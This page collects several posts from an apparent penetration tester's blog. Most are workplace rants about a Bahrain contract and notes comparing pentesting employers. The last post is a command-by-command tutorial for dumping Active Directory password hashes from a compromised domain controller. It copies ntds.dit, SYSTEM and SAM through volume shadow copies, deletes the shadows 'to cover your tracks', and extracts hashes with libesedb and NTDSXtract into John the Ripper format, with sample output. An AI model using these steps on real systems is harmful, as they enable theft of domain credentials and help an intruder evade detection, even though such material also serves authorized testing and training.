Bahrain – Working for another manager is trying my patience

Well I am almost done with my small tour in Bahrain, and will be glad to be home. I will miss some of the people, they are great and were a joy to work with.

As for the project that my company is contracted on, I am a little pissed that nothing has really been done, since I last left from working over here. Well none of the projects that we were supposed to be working on. Many of the other vendors that had projects have finished, or are scheduled to finish their projects. It seems that the manager in charge has either not worried about the project or is clueless that his employees are lying to him.

The two people that were hired to come over here and work for the last year, which are not security minded people by the way, did almost nothing during the time they were over here. From what I can tell, it looks like they relied on other vendors to do most of the work and they took all of the credit for it. Most of the projects are not even actually started, but are marked as partially complete. I have been working on a Bit9 installation for a couple of weeks, there are 1200+ workstations in the environment, and only 130 systems have the software installed. There are no real policies defined, and  only two workstations are locked down. The manager believes that all systems have the software installed and they are completely protected, I tried to let him know, and he did not see to want to hear it. I dropped the conversations and began working on a solution to the issue.

I am ready to get back to pentesting, where I can actually do some good, well I will keep telling my self that. Many of my customers, just want a band-aid to cover over the problems, and not really work on fixing things, but I still get to have fun in the process.

Share via email Share
Posted in 2014, Bahrain, Rants, Security, Travel | Comments Off on Bahrain – Working for another manager is trying my patience

Heading back to Bahrain for my 3rd Trip

Heading out Monday July 21st to Bahrain for another 45 days of excitement in Bahrain. My company was renting an apartment since last year, but they let the lease lapse, so I will be staying in the Marriott for the stays. Which is fine with me, I like getting the points, and plus it has free breakfast. I guess they are expecting for me to look for another apartment to rent, not sure why the last person who was there did not do this, since he works on the project full time (or is supposed to).

No sure what I will be working on this time around, since I have not been involved with this project since last year when I was there. Have had little information given to me from the director of this project, and the employees assigned to the director of this project have been little help giving me information.

Did not really want to head back, but my boss sort of gave me a “you do not really have an option” speech. I was supposed to heading to Defcon during this time frame and told him I would prefer to that that then to Bahrain. I was then told that was not a good reason to not go on the trip, and something like “I cannot justify you going to training instead of this trip” or something similar to that. This did not really make me happy, and they originally wanted me to go for 90 days, but I had to do military duty so I could only squeeze in the 45 days to go (well that is what I told them). Not like they could really argue about me not being able to go, since it is the federal government and all.

I was surprised that they were expecting me to go to cover this time frame for the project, but it seems that one the two people they hired does not want to go back over there anymore. I was a little pissed about that, and think they need to fire him since he was specifically hired to do this project. Sure that will not happen, since they have him doing training for Alien Vault software occasionally.

This is partly one reason I started researching penetration testing companies. Have found a few I like, but not sure if I will be looking for a new place to work just yet. Need to see if they are expecting me to make more trips back to Bahrain. I already told my director that I would not be heading back over already, so to not even ask me about it.

Share via email Share
Posted in 2014, Bahrain, Military, Rants, Work | Comments Off on Heading back to Bahrain for my 3rd Trip

Pentesting Companies – Praetorian

I have been researching a few pentesting companies over the past few months, just to compare my current employer to others. I am happy at my current employer, I enjoy what I do, and most of the people I work with. I am just curious what other companies do for their employees, and what they require from them.

Through my research I noticed that many of them give fairly good benefits, and seem to have a relaxed work environment.

I was surprised that several require their employees to speak at conferences, write white-papers, and do research. While I am not against any of this, I am wondering how they would have time to accomplish any of this. I am booked solid usually weeks on end, with maybe a  day or less of down time a month. Many also require 25% or more travel, which I am not opposed to either, but I generally do most of my assessments remotely. I have complained to my boss that we do not travel to customers enough. I prefer to do some face-to-face conversations with my customers to get a better understanding of their needs. Plus it makes it easier to social engineer information from someone.

I was fairly impressed with Praetorian who is head quarters are in Austin, TX. They seem to have some very skilled and knowledgable consultants, who are involved in the security community and open-source projects. They seem to be involved with the local college (University of Texas), having career expos at UT. They also have some small puzzles that you can try to work. I will have to try these when I get some spare time.

A Job Posting for a “Senior Security Consultant (Software)”

Qualifications: Successful candidates should have:

  1. 2-5 years of information security experience
  2. 1-2 years of consulting experience
  3. Strong understanding of software and application security
  4. Experience with languages such as C, C++, Java, .NET, Ruby, and Python
  5. Strong oral and written communication skills
  6. Involvement in software community via OWASP, WASC, and/or open source development highly desirable
  7. Track record speaking at major security conferences such as OWASP Appsec, SANS Appsec, and Blackhat highly desirable
  8. Ability to travel 10% of the time
  9. Minimum 4-Year Bachelor of Science Degree in Computer Science, Engineering, or equivalent from a “top ten” institution.

While the travel is a lot less than many of the other companies, they require a person who is good a public speaking at large conferences and is involved in the security community.

Well I guess if  I wanted to go and work for them, I need to start speaking at conferences and get more involved in the security community. Not really going back to college to get a degree from a “Top Ten” institution unless some one else is willing to pay for it.


Share via email Share
Posted in 2014, Security, Work | Comments Off on Pentesting Companies – Praetorian

Penetration Testing Companies

I have been doing a little research about penetration testing companies, not that I am looking at leaving my current employer, but I am curious about how other companies perform their network vulnerability assessments (NVA) and penetration tests (PT).

I decided to start by asking our marketing manager who are competition was, and was rather surprised that he did not really have an answer. He could not give me any companies that he though were out competition, he knew of a few companies but not a specific competitor. This scares me a little, how can you not know who you are competing with and who you might be loosing business to.

I know of several who I believe we are competing with, one is a former employee of the company who left and started his own security company. The others are the larger companies who have more resources and are recognized by major corporations as a leader in the industry.

During my research, I discovered that there are tons of companies that say they do NVA/PT assessments, along with other services that we do and many we do not. The companies ranged in size and services. Some only did security assessments while others did Risk assessments, and many said they did PCI, HPIAA, E3IPA compliance assessments.

I am working on correlating a list of companies, that truly do penetration testing.

Some of the companies I am doing research on, and consider to be a possible competitor to my employer.

Dell SecureWorks

I know there are many more that I have not listed, but will get around to reviewing as many as I can in my spare time.

Share via email Share
Posted in 2014, Security, Work | Comments Off on Penetration Testing Companies

Getting Hashes from NTDS.dit file

Read a writeup from @Mubix about doing this and noticed that some changes had come to the NTDSxtract software which made things a little easier, so I decided to do a write up on on the two versions

Why do you want to do this anyways?
The reason you would want to pull the ntds.dit file from a Domain Controller after you have compromised it is because you do not want to create a new Domain Administrator account (could set off alerts) and need password hashes; or you need a password for another account to access data you want (ie. SQL Server accounts).

Get the ntds.dit and SYSTEM from Volume Shadow Copy on a Domain Controller

1. Vssadmin tool

1.1 List Volume Shadow Copies on the system:

Example: ‘vssadmin list shadows’ no Shadows Available

C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line too
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.

1.2. Create a new Volume Shadow Copy of the current drive:

Example: ‘vssadmin create shadow’ copy:

C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for ‘c:\’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

2. Pull files from the Volume Shadow copy

copy \\?\GLOBALROOT\Device\<SHADOWYCOPY DISK>\windows\<directory>\<File> <where to put file>
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

 [X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1 (there could be multiple copies, use the last one listed)

I would also recommend getting a current copy of SYSTEM from the registry just in case.


I have had a couple times where the SYSTEM file from the shadow copy was corrupt.

3. Delete the shadows to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
vssadmin delete shadows /for=C: /shadow= e8eb7931-5056-4f7d-a5d7-05c30da3e1b3

4. Optional VSSOwn Script to help with this task:

5. Now that you have the files, it is time to get the hashes

5.1 Utilities needed:

  • libesedb
  • ntdsxtract

5.2 libesedb

Extract the files

# tar -xzvf libesedb-alpha-20120102.tar.gz

Compile/make libesedb

# cd libesedb-20120102
# ./configure
# make

Need to move this somewhere like ‘/usr/local/’

# mv esedbtools/ /usr/local
# cd esedbtools/

esedbexport usage:

Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source
source: the source file
-c:     codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h:     shows this help
-l:     logs information about the exported items
-m:     export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t:     specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T:     exports only a specific table
-v:     verbose output to stderr
-V:     print version

Run esedbexport to extract ntds.dit data :

./esedbexport  -t  <Directory to export data to(will add .export to the end)> <ntds.dit file>
# ./esedbexport  -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.

Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

Extracted files:

# ls ~/ntdis.export/

5.3 NTDSXtract:
# unzip
# cd NTDSXtract\ 1.0/

To update to the new 1.2 Beta version unzip the contents in side the “NTDSXtract 1.0”
(You might want to rename the directory to just NTDSXtract)

# unzip

Usage for (Version 1.0 and 1.2 Beta)

Ver 1.0

 # python
 Extracts information related to user objects
 usage: <datatable> <linktable> [option]
 --rid <user rid>
 List user identified by RID
 --name <user name>
 List user identified by Name
 --passwordhashes <system hive>
 Extract password hashes
 --passwordhistory <system hive>
 Extract password history
 Extract certificates
 --supplcreds <system hive>
 Extract kerberos keys
 List groups of which the user is a member

Ver 1.2

 # python ../NTDSXtract\ 1.0/ 
 DSUsers v1.2
 Extracts information related to user objects
 usage: ../NTDSXtract 1.0/ <datatable> <linktable> <work directory> [option]
 The path to the file called datatable extracted by esedbexport
 The path to the file called linktable extracted by esedbexport
 work directory
 The path to the directory where ntdsxtract should store its
 cache files and output files. If the directory does not exist
 it will be created.

 --rid <user rid>
 List user identified by RID
 --name <user name>
 List user identified by Name
     --syshive <path to system hive>
 Required for password hash and history extraction
 This option should be specified before the password hash
 and password history extraction options!
 --lmoutfile    <name of the LM hash output file>
 --ntoutfile      <name of the NT hash output file>
 --pwdformat  <format of the hash output>
 ophc - OphCrack format
 When this format is specified the NT output file will be used
 john - John The Ripper format
 Extract password hashes
 Extract password history
 Extract certificates
 Extract kerberos keys
 List groups of which the user is a member
 --csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the output

Extract user info:

Ver 1.0

# python ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 --passwordhashes ~/sys --passwordhistory ../sys
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 40933 records processed
Extracting schema information - 100% -> 4142 records processed
Extracting object links...

List of users:
Record ID:           1815
User name:           Administrator
User principal name: Administrator@DOMAIN
SAM Account name:    Administrator
GUID: 3543ea4c-f755-4758-97c0-3d63dffc96ad
SID:  S-1-5-21-657512695-1375287660-316888650-500
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 16:10:29
Account expires:      Never
Password last set:    2006-08-22 11:53:34.828125
Last logon:           2013-10-03 19:11:25.366397
Last logon timestamp: 2013-09-30 10:43:09.479359
Bad password time     2013-10-03 17:36:20.168265
Logon count:          65535
Bad password count:   0
User Account Control:
PWD Never Expires
$ROOT_OBJECT$ priv DOMAIN main Domain Admins Administrator
Password hashes:
Password history:
Record ID:           1816
User name:           Guest
User principal name:
SAM Account name:    Guest
GUID: 2e792141-c4be-43b2-a4f5-079e5d05e184
SID:  S-1-5-21-657512695-1375287660-316888650-501
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 15:19:28
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     2013-10-03 18:18:45.096975
Logon count:          0
Bad password count:   1
User Account Control:
PWD Not Required
PWD Never Expires
$ROOT_OBJECT$ priv DOMAIN main Users Guest
Password hashes:
Password history:

….(Continues for each Account)….

Ver 1.2 (Output in JTR Format)

python ~/ntds.export/datatable.3  ~/ntds.export/link_table.4 ~/TEMP  --passwordhashes --passwordhistory --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

List of users:
Record ID:           32777
User name:           joe smith
User principal name:
SAM Account name:    jsmith
GUID: 14c15e2a-8f7c-4404-a63c-cb6a4c689c00
SID:  S-1-5-21-349701255-3731294407-2303513147-3800
When created:         2005-06-01 13:50:37
When changed:         2013-12-12 15:08:12
Account expires:      Never
Password last set:    2013-10-07 13:20:19.146593
Last logon:           2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time     2013-12-11 00:04:52.446209
Logon count:          6239
Bad password count:   0
User Account Control:
$ROOT_OBJECT$ local DOMAIN JOB Users joe smith
Password hashes:

….(Continues for each Account)….

Version 1.2 allows you to extract the hashes into two files, one for LM hashes the other for NT hashes, and currently supports two hash output types; Ophcrack and John.

Share via email Share
Posted in 2013, Hashes, Password, Security, Windows, Work | Comments Off on Getting Hashes from NTDS.dit file